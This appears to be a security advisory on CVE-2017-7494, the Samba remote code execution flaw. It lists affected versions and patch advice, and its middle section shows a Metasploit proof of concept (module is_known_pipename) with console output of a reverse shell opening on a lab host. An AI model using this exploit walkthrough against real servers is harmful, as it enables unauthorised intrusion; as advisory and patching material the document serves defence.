CVE-2017-7494: Samba remote code execution vulnerability

CVE-2017-7494

Overview

Samba is an open source program that allows end-users utilizing SMB/CIFS clients to access files, printers and other commonly shared network resources. Samba is commonly used on Linux computers, allowing the network shares to be accessed by other computers, such as those running Microsoft Windows.

May 24, 2017, Samba released version 4.6.4, which fixes a serious remote code execution vulnerability, vulnerability number CVE-2017-7494, which affected Samba 3.5.0 onwards.

A brief description of the vulnerability

All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.

Vulnerability number: CVE-2017-7494

Severity Rating: High

Affected software:

  • Samba Version < 4.6.4
  • Samba Version < 4.5.10
  • Samba Version < 4.4.14

Unaffected software:

  • Samba Version = 4.6.4
  • Samba Version = 4.5.10
  • Samba Version = 4.4.14

POC

Exploit CVE-2017-7494 using Metasploit.

  1. Update your Metasploit: apt-get update && apt-get upgrade
  2. Use module: exploits/linux/samba/is_known_pipename
    Module description:
    This module triggers an arbitrarily shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability.
  3. Get shell 😀
    msf exploit(is_known_pipename) > exploit 
    

    [*] Started reverse TCP handler on 192.168.0.3:4444
    [*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path
    [*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so
    [*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so...
    [*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500

    id
    uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)

Fix Information

  • Samba users who use source installation should download the latest Samba version as soon as possible.
  • Use the binary distribution package (RPM, etc.), users immediately for yum, apt-get update and other security update operation

Demo